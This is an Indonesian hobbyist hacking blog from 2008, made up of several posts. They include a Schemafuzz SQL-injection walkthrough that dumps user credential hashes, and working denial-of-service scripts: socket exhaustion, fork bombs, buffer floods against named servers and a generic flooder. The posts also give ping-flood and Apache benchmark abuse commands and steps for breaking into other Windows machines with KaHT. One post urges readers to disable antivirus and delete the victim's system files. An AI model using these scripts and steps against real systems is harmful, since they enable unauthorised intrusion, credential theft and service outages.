Powered By Blogger

Script gado2 buat FS

Posted: Kamis, 25 Desember 2008 by QIWS in Label:
0

Fuihhh… Dah lama ga post nic, soalnya kemaren2 bgt. Ujian, ngapalin, maen, hacking (nah kalo yang ini hamper setiap hari Gw lakuin ada yang berhasil, kebanyakan sic yang gagal he…he… ) Mau cerita dulu ah boleh ya?? Begini kemarin Gw kumpul2 ma tmn2 Gw terus ada yang nanya”Qiws lo bisa mempercantik or mengubah fs Gw ga??” Jaelah Pertanyaan yang sedikit tolol sebenarnya heee…heee…. Gw jawab aza “Kalo mau mempercantik yah kesalon Non” jawaban yang simple dan sangan ga nyambung.. Langsung aja tuh teman Gw marah2. Nah semenjak kejadian ntu Gw jadi sedikit nyesel sic, kenapa dulu Gw ga bantuin aja, kali2 aja dijadiin pacar ma dia hahahahah ngarep bgt Gw. Untuk kali ini Gw mu ngasih kode2 or script2.. buat bikin yang aneh2 di FS. Langsung aja deh dunlut di sini.
http://www.2shared.com/file/4518493/387cc9f7/Script_buat_FS.html
Oya tapi maaf nic kalo yang mau make jangan asal jiplak aja yah, ganti dulu namanya edit dulu dah yang penting, solanya biar belajar kreatif gitu he..he… Eh 1 hal lagi sory ni code & script acak2kan dan kalo ada yang ga jalan mohon di maklum yah soalnya dah lama ga maenan FS. Ni merupakan koleksi Gw dulu. Sekian ah semoga bermanfaat.

Schemafuzz.py

Posted: Jumat, 19 Desember 2008 by QIWS in Label:
0

Udh lma Gw ga post lg, kali ini Gw mu ngjlasin caranya hack dengan Schemafuzz.py ahh. Tutor ni Gw peruntukan tuk shbt Gw yang pingin bgt bljr hacking, ok sob ni buat loe. Langsung aza dec .
Schemafuzz.py dibuat dengan menggunakan bahasa python Oleh siapa Gw lupa lagi sory, tapi kalo penasaran cari aja di Paman Google pasti ada. Fungsi dari Schemafuzz.py adalah memudahkan menemukan tabel dan kolom pada database sql
Supaya ga lama Gw kasih liat contonya aza dec … Liat baek-baek yah :
pertama-tama kita mari kita panjatkan puji dan syukur ke hadirat allah swt jaelah gayanya kaya yg mau pidato aja ….. just kidding. Ok pertama cari target dengan google, misalkan ditemukan: http://127.0.0.1/site/phpweb/forum.php?forum=1

sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help Trus kita temukan sebagian perintahnya seperti ini
--schema, --dbs, --dump, --fuzz, --info, --full, --findcol
langkah pertama
----------------
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!

langkah kedua
--------------
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...

[+] Found a table called: mysql.user

[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!

[-] [01:37:48]
[-] Total URL Requests 618
[-] Done

langkah ketiga
---------------
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33

[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail

[-] [01:43:48]
[-] Total URL Requests 270
[-] Done

untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info
maka akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--

[+] Do we have Access to Load_File: No

[-] [01:46:51]
[-] Total URL Requests 3
[-] Done

ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe

untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini

./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs
akan tampil seperti ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1

[0] webthings

[-] [01:58:17]
[-] Total URL Requests 30
[-] Done

langkah selanjutnya
--------------------

cara untuk menemukan user dan password
kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password

eing ing eng....
jreennnng....keluar deh user ama passwordnya
hasilnya dibawah ini

[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2

[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:

[-] [02:08:48]
[-] Total URL Requests 4
[-] Done

jangan lupa kita selalu mengecek schemafuzzlog.txt nya
setelah itu tinggal kita meng crack passwordnya pake program
gemana rekan2 gampang kan pake schemafuzz
Catatan :
Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya

Teknik melakukan DoS part 2

Posted: by QIWS in Label:
0

Teknik melakukan DoS part 2-selesai….. nah sekarang Gw sambung lagi nih. Seperti janji Gw pada post sebelumnya. Kali ini Gw bakal kasih beberapa script untuk malakukan DoS. Yaudah langsung aja lah.

Script gs.pl (gantung socket)
#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!
Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.
1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU
#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory
#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Gw mengamati serangan ini dari beberapa advisories di BugTraq. Remote Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat terjadi secara remote jika demon (server) tidak melakukan verifikasi input sehingga input membanjiri buffer dan menyebabkan program dihentikan secara paksa. Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes, versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl
#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";
print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net
Proof of Concept:
% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command SELECT. Dampak dari serangan ini adalah berhentiya server dan harus di-restart secara manual.

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat' Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja - membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.
Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS. Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

-- udos.pl --
#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# End.

-- udos.pl --

Skrip sederhana diatas hanya melakukan hubungan dengan server korban, lalu mengirimkan flood dan melakukan post testing. Dengan sedikit pemprograman lo dapat membuat sebuah 'Mass Flooder' atau 'Brute Force Flooder', tergantung pada kreatifitas sendiri !

Teknik melakukan DoS Part 1

Posted: by QIWS in Label:
0

Teknik melakukan DoS ….. hmmm… mungkin ada yang sudah tau, tapi tips ini Gw tulis supaya kita semua lebih ngerti. Jadi kalo udah tau baca aja lagi sipa tau bisa mengtoreksi OK !!! Pertama Gw pernah ngejelasin apa itu Denial of Service (Dos) nah sekarang Gw akan nerangin gimana cara melakukan DoS. Langsung aja yac biar ga lama

DoS serangan sadis dan sangat seporadis jaelah kaya apa aja, biasanya si motif orang yang melakukan DoS bermacam-macam tapi kali ini Gw ga punya maksud apa2ko nulis ini, Cuma pengen berbagi ilmu aja. Ok next tipe2 penyerangan DoS cukup banyak diantaranya :

1. Ping Flooding

Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network). Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP. Varian dari serangan ini disebut "smurfing"

(http://www.quadrunner.com/~chuegen/smurf.txt).

2. SYN-Flooding

SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegahmenolak cracker untuk mengakses sistem.

3. Pentium 'FOOF' Bug

Merupakan serangan Denial of Service terhadap prosessor Pentium yang menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor yang digunakan yaitu pentium.

Nah sekarang Gw mu ngejelasin bagaimana caranya menyerang menggunakan exploits. Ada beberapa hal yang mesti kita tau dulu diantaranya :

A. Serangan membutuhkan Shell Linux (Unix/Comp)

B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search agar lebih mudah)

C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)

Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms.Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah membuat hang/blue screen of death pada komputer korban.

Cara penggunaan:

A. Dapatkan file kod.c

B. Compile dengan Gcc: $ gcc -o kod kod.c

C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]

Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung kepada jenis sistem operasi dan konfigurasi server target (misalmya: blocking)

2. BONK/BOINK

Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT

3. Jolt

Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet yang tinggi sekali kepada korban.

4. NesTea

Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows versi awal. Versi improve dari NesTea dikenal dengan NesTea2

5. NewTear

Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk (bonk.c)

6. Syndrop

Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target serangan adalah Linux dan Windows

7. TearDrop

TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung

ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood

Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran. bash # ping -fs 65000 [ip_target]

2. Apache Benchmark

Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan) suatu web server, namun tidak tertutup kemungkinan untuk melakukan penyalahgunaan. bash $ /usr/sbin/ab -n 10000 -c 300 \ http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum (diketik dalam 1 baris!) Akan melakukan 10000 request paralel 300 kepada host korban.com

3. Menggantung Socket

Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients. Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1 request simultan dengan koneksi terpisah-pisah. Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit). Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan, seolah-olah server korban tewas. Nah segitu aja penjelasan dari Gw. Next time Gw bakal kasih liat beberapa contoh Script untuk melakukan DoS. Soalnya sekarang Gw ngantuk bgt. Ok sekian dulu untuh hari ini besok di sambung lagi Gw mu po2 dulu nic.

Masuk Ke Kompi Laen Melalui dos

Posted: Minggu, 07 Desember 2008 by QIWS in Label:
2

Sekarang Gw ada di warnen and Hujan2 gini enaknya iseng , eummm tapi bingung mu iseng apa yah?? 30 menit Gw berpikir belum juga ada ide but ketika Gw dapet email dari sohib Gw, langsung dec Gw dapet ide yang lumayan gokil he…he.. Apa itu?? Coba kira2 apa? Yaudah Gw jawab aza kali ini Gw mu coba masuk ke dalam computer orang laen tapi untuk winsows XP, jaelah gayanya Gw kaya yang jago aza he…he.. Yah tapi namanya juga belajar so Gw coba semuanya bener ga?? Mangkanya kali ini Gw mu ngasih tips2nya. Yaudah “SELAMAT MENYAKSIKAN AZA” he….he…

1. Pertama kita mesti ngelacak alamat IP suatu situs dulu. Terus kita lakukan PING terhadap situs tersebut caranya ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut. Yupz gampang kan?? Nah sekarang sext step

2. Melacak Lokasi server (real address) suatu situs. Caranya kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja, jaelah ko gampang bener?? Emang gampang so tau mode ON he…he… Kembali ke topic. Ok untuk membuktikanya buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota. Gimana cukup mudah kan?? Yaudah kalo ngerti next step

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya ni bisa kita lakuin dengan sangat simple. Caranya Kirimkan suatu file pada lawan chat kita. Apa ajalah yang penting file, lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. Nah tahap selanjutnya Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

Nah jika semuanya udah siap maka …. Tinggal bertempurlah, jaelah gayanya kaya tentara aja. Ok langsung aja pertama kita siapkan tools. Nih download dlu

internet Maniac (Internet Maniac.exe) … Download Interenet
Maniac<http://www.brothersoft.com/internet-maniac-5194.html>
Berfungsi untuk mengetahui ip addreas client melalui computer name /
hostname
KaHT (KaHt.exe) … Download program hacker
KaHT<http://www.divshare.com/download/2252578-e5c>
Berfungsi sebagai program untuk menerobos ke computer server atau client

1. Ok jika 2 program diatas udah di download maka ekstractlah dahulu program
tersebut, Kalo udah di extract lalu loe periksa dahulu jaringan loe dengan melihat para hostname dengan cara. Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu
pilih A computer on the Network lalu langsung klik search maka akan segera
muncul computer-komputer yang terkoneksi dalam jaringan.

2. Setelah itu loe langsung jalankan program Internet Maniac lalu Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik
resolve, disini loe akan mendapat alamat ip computer tersebut. Dengan nomor
ip ini maka loe sudah mengetahui sasaran computer yang akan di masuki. Jaelah siap tempur nic he…he..

3. Tahap selanjutnya Setelah yang tadi selesai tentunya. Maka kita tinggalkan program Internet Maniac, lalu berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, jaelah ko bisa?? Klo nanya kaya gitu tanya aza pada Paman Google. Tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, Jika antivirus membuat kerja kita semakin sulit delet aja antivirusnya,he…he.. Oya Gw hamper lupa, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan loe menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode. Artinya loe harus tau belajar dulu dari dasar…he..he.. Tapi jangan takut banyak ko di Paman Google. Yaudah langsung aza ketahap selanjutnya

4. Masuklah ke Start, All programs, Accessories lalu Command Prompt nah setelah itu maka masuklah di directory program KaHT, yang tadi diextract, awas janan ampe lupa tempatnya (Misal tadi di extract di
C:\KaH) maka ketikkan “CD\KaHT” dan seterusnya.

5. Sekarang saatnya beraksi : Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. Bingung?? yaudah Gw kasih contoh :

ip1 : ip awal yang discan
ip2 : ip terahkir yang discan Misalnya tadi ip-nya 193.136.0.1 setelah di detect pakek Internet Maniac
yang tadi ada di tahap no 2. Maka ketikkan saja “KaHT 193.136.0.0 193.136.0.1 lalu enter aja Nah disini nanti program akan bekerja otomatis. Ngerti kan??

6. Nah setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka loe akan otomatis berada di computer target, untuk lebih persisnya anda akan berada di “c:\windows\system” milik komputer tujuan / target setelah pen-scan-an selesai.

7. Nah setelah selesai semua terus kita ngapain…. Setelah semuanya selesai loe padamin kompinya terus tidur dec he…he… becanda. Setelah selesai semuanya maka yaudah otomatis loe bisa ngacak2 tuc kompi bebas, mau diapain juga bukan punya Gw ini he…he.. or lw pengen ngerusaknya gampang delete aja file-file systemnya, BOOM dengan seketika kompipun …………….. Selamat mencoba aza yah!!

DoS

Posted: by QIWS in Label:
0

Ktmu lgi bareng Gw Qiws yang sekarng udah ga cupu lagi he…he… Bingung nic ko akhir2 ni Gw doyan bgt curat-oret di blogyah, tpi ga pa2lah yg penting bagi Gw selagi Gw ga ngerugiin oramg & Gw hapy. Enjoy aja , Bener ga ?? Yaudah sekrang Gw mu nerangin dikit gambaran umum tentang Denial of Service (DoS). Nah lho ada apa an itu??Ada yang kenal ga?? Klo ngga ga usah khawatir sekarng Gw pingin ngebagi ilmu Gw tentang DOS.. Buat pembelajaran, yah Gw juga masih belajar so itung2 belajar bersama. Tapi sebelumnya Gw mu nerangin dulu apa sic DoS..Yaudah sekarang simak yac he…he.. Kaya guru aza nic Gw.

1. Apa itu DoS?

Hmmm…. DoS adalah aktifitas menghambat kerja sebuah layanan (servis) or mematikan-nya, sehingga user yang berhak or berkepentingan tidak dapat menggunakan or mengakses layanan tersebut. Jaelah ko jahat amat yah?? Yaemang udah gitu dari sononya. Oya Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu) tapi biasanya emang fatal sic. Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, maksudnya sulit disembuhkan, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti hukum ini. Yah ini hokum bukan hokum rimba lho!!! Tpi emang gitu efeknya ngeri kan?

2. aktifitas DoS

Ada beberapa aktifitas DoS tpi Gw mu nerangin 4 aja soalnya baru itu yang Gw pahami

a. Aktifitas 'flooding' terhadap suatu server.

b. Memutuskan koneksi antara 2 mesin.

c. Mencegah korban untuk dapat menggunakan layanan.

d. Merusak sistem agar korban tidak dapat menggunakan layanan

3. Motif penyerangan dengan melakukan DoS

Jaelah mulai kaya polisi aja pake motif, tapi biar kalo belajar itu jangan setengah2 kata nenek itu berbahaya he…he… Ok dec kembali ke topic.

Menurut opini seseorang dari bukunya yang berjudul aduh Gw lupa eum… sory Gw lupa nama. Buku & orangnya , tapi perasaan orang luar negeri dec… ntar klo inget Gw tulis dec. Pokonya ada 6 motif katanya .

1. Status Sub-Kultural.

2. Untuk mendapatkan akses.

3. Balas dendam.

4. Alasan politik.

5. Alasan ekonomi.

6. Tujuan kejahatan/keisengan.

